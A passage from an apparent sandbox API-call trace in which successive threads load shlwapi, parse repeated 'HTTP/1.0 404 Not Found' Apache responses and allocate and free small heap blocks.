lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0271.242] GetProcessHeap () returned 0x6a0000 [0271.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0271.242] GetProcessHeap () returned 0x6a0000 [0271.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0271.242] GetProcessHeap () returned 0x6a0000 [0271.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 471 os_tid = 0x171c [0271.435] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.436] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:58 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0271.436] GetProcessHeap () returned 0x6a0000 [0271.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0271.436] GetProcessHeap () returned 0x6a0000 [0271.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0271.436] GetProcessHeap () returned 0x6a0000 [0271.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 472 os_tid = 0x1720 [0271.690] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.691] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:58 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0271.691] GetProcessHeap () returned 0x6a0000 [0271.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0271.691] GetProcessHeap () returned 0x6a0000 [0271.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0271.691] GetProcessHeap () returned 0x6a0000 [0271.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 473 os_tid = 0x1724 [0271.869] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.919] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:58 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0271.919] GetProcessHeap () returned 0x6a0000 [0271.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea48 [0271.919] GetProcessHeap () returned 0x6a0000 [0271.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea48 | out: hHeap=0x6a0000) returned 1 [0271.919] GetProcessHeap () returned 0x6a0000 [0271.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 474 os_tid = 0x172c [0272.143] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.144] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:59 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0272.144] GetProcessHeap () returned 0x6a0000 [0272.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0272.144] GetProcessHeap () returned 0x6a0000 [0272.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0272.144] GetProcessHeap () returned 0x6a0000 [0272.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 475 os_tid = 0x1730 [0272.352] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.352] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:59 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0272.353] GetProcessHeap () returned 0x6a0000 [0272.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0272.353] GetProcessHeap () returned 0x6a0000 [0272.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0272.353] GetProcessHeap () returned 0x6a0000 [0272.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 476 os_tid = 0x1734 [0272.564] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.564] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:59 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0272.565] GetProcessHeap () returned 0x6a0000 [0272.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea48 [0272.565] GetProcessHeap () returned 0x6a0000 [0272.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea48 | out: hHeap=0x6a0000) returned 1 [0272.565] GetProcessHeap () returned 0x6a0000 [0272.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 477 os_tid = 0x1738 [0272.758] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.758] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:59 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0272.758] GetProcessHeap () returned 0x6a0000 [0272.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea48 [0272.758] GetProcessHeap () returned 0x6a0000 [0272.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea48 | out: hHeap=0x6a0000) returned 1 [0272.759] GetProcessHeap () returned 0x6a0000 [0272.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 478 os_tid = 0x173c [0273.024] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.024] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:59 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0273.024] GetProcessHeap () returned 0x6a0000 [0273.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0273.024] GetProcessHeap () returned 0x6a0000 [0273.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0273.024] GetProcessHeap () returned 0x6a0000 [0273.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 479 os_tid = 0x1744 [0273.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.266] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:00 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0273.266] GetProcessHeap () returned 0x6a0000 [0273.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0273.266] GetProcessHeap () returned 0x6a0000 [0273.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0273.266] GetProcessHeap () returned 0x6a0000 [0273.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 480 os_tid = 0x1748 [0273.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.447] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:00 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0273.447] GetProcessHeap () returned 0x6a0000 [0273.447] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0273.447] GetProcessHeap () returned 0x6a0000 [0273.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0273.447] GetProcessHeap () returned 0x6a0000 [0273.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 481 os_tid = 0x174c [0273.686] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.687] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:00 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0273.687] GetProcessHeap () returned 0x6a0000 [0273.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be820 [0273.687] GetProcessHeap () returned 0x6a0000 [0273.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be820 | out: hHeap=0x6a0000) returned 1 [0273.687] GetProcessHeap () returned 0x6a0000 [0273.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 482 os_tid = 0x1750 [0273.925] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.925] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:00 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0273.925] GetProcessHeap () returned 0x6a0000 [0273.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be820 [0273.925] GetProcessHeap () returned 0x6a0000 [0273.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be820 | out: hHeap=0x6a0000) returned 1 [0273.925] GetProcessHeap () returned 0x6a0000 [0273.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 483 os_tid = 0x1754 [0274.219] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.220] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:01 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0274.220] GetProcessHeap () returned 0x6a0000 [0274.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be820 [0274.220] GetProcessHeap () returned 0x6a0000 [0274.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be820 | out: hHeap=0x6a0000) returned 1 [0274.220] GetProcessHeap () returned 0x6a0000 [0274.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 484 os_tid = 0x1758 [0274.431] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.432] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:01 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0274.432] GetProcessHeap () returned 0x6a0000 [0274.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be838 [0274.432] GetProcessHeap () returned 0x6a0000 [0274.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be838 | out: hHeap=0x6a0000) returned 1 [0274.432] GetProcessHeap () returned 0x6a0000 [0274.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 485 os_tid = 0x175c [0274.794] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.794] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:01 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0274.794] GetProcessHeap () returned 0x6a0000 [0274.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be808 [0274.794] GetProcessHeap () returned 0x6a0000 [0274.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be808 | out: hHeap=0x6a0000) returned 1 [0274.794] GetProcessHeap () returned 0x6a0000 [0274.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 486 os_tid = 0x1760 [0275.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.205] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:02 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0275.205] GetProcessHeap () returned 0x6a0000 [0275.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be808 [0275.205] GetProcessHeap () returned 0x6a0000 [0275.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be808 | out: hHeap=0x6a0000) returned 1 [0275.205] GetProcessHeap () returned 0x6a0000 [0275.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 487 os_tid = 0x1764 [0275.423] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.423] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:02 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0275.423] GetProcessHeap () returned 0x6a0000 [0275.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be808 [0275.424] GetProcessHeap () returned 0x6a0000 [0275.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be808 | out: hHeap=0x6a0000) returned 1 [0275.424] GetProcessHeap () returned 0x6a0000 [0275.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 488 os_tid = 0x1768 [0275.641] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.642] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:02 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0275.642] GetProcessHeap () returned 0x6a0000 [0275.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0275.642] GetProcessHeap () returned 0x6a0000 [0275.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0275.642] GetProcessHeap () returned 0x6a0000 [0275.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 489 os_tid = 0x176c [0275.833] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.833] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:02 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0275.833] GetProcessHeap () returned 0x6a0000 [0275.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0275.833] GetProcessHeap () returned 0x6a0000 [0275.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0275.834] GetProcessHeap () returned 0x6a0000 [0275.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 490 os_tid = 0x1770 [0276.058] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.058] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:03 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0276.058] GetProcessHeap () returned 0x6a0000 [0276.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be808 [0276.058] GetProcessHeap () returned 0x6a0000 [0276.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be808 | out: hHeap=0x6a0000) returned 1 [0276.058] GetProcessHeap () returned 0x6a0000 [0276.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 491 os_tid = 0x1774 [0276.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.304] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:03 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0276.304] GetProcessHeap () returned 0x6a0000 [0276.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea18 [0276.304] GetProcessHeap () returned 0x6a0000 [0276.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea18 | out: hHeap=0x6a0000) returned 1 [0276.304] GetProcessHeap () returned 0x6a0000 [0276.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 492 os_tid = 0x1778 [0276.522] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.523] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:03 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0276.523] GetProcessHeap () returned 0x6a0000 [0276.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0276.523] GetProcessHeap () returned 0x6a0000 [0276.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0276.523] GetProcessHeap () returned 0x6a0000 [0276.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 493 os_tid = 0x177c [0276.752] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.752] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:03 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0276.753] GetProcessHeap () returned 0x6a0000 [0276.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0276.753] GetProcessHeap () returned 0x6a0000 [0276.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0276.753] GetProcessHeap () returned 0x6a0000 [0276.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 494 os_tid = 0x1780 [0276.976] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.977] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:03 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0276.977] GetProcessHeap () returned 0x6a0000 [0276.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be808 [0276.977] GetProcessHeap () returned 0x6a0000 [0276.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be808 | out: hHeap=0x6a0000) returned 1 [0276.980] GetProcessHeap () returned 0x6a0000 [0276.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 495 os_tid = 0x1784 [0277.268] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.269] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0277.269] GetProcessHeap () returned 0x6a0000 [0277.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea60 [0277.269] GetProcessHeap () returned 0x6a0000 [0277.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea60 | out: hHeap=0x6a0000) returned 1 [0277.269] GetProcessHeap () returned 0x6a0000 [0277.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 496 os_tid = 0x1788 [0277.433] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.434] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0277.434] GetProcessHeap () returned 0x6a0000 [0277.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea60 [0277.434] GetProcessHeap () returned 0x6a0000 [0277.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea60 | out: hHeap=0x6a0000) returned 1 [0277.434] GetProcessHeap () returned 0x6a0000 [0277.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 497 os_tid = 0x178c [0277.662] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.663] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0277.663] GetProcessHeap () returned 0x6a0000 [0277.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0277.663] GetProcessHeap () returned 0x6a0000 [0277.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0277.663] GetProcessHeap () returned 0x6a0000 [0277.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 498 os_tid = 0x1790 [0277.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0277.861] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0277.861] GetProcessHeap () returned 0x6a0000 [0277.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea60 [0277.861] GetProcessHeap () returned 0x6a0000 [0277.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea60 | out: hHeap=0x6a0000) returned 1 [0277.861] GetProcessHeap () returned 0x6a0000 [0277.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 499 os_tid = 0x1794 [0278.098] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.098] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:05 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0278.098] GetProcessHeap () returned 0x6a0000 [0278.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea60 [0278.098] GetProcessHeap () returned 0x6a0000 [0278.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea60 | out: hHeap=0x6a0000) returned 1 [0278.099] GetProcessHeap () returned 0x6a0000 [0278.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 500 os_tid = 0x1798 [0278.260] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.260] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:05 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0278.260] GetProcessHeap () returned 0x6a0000 [0278.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea30 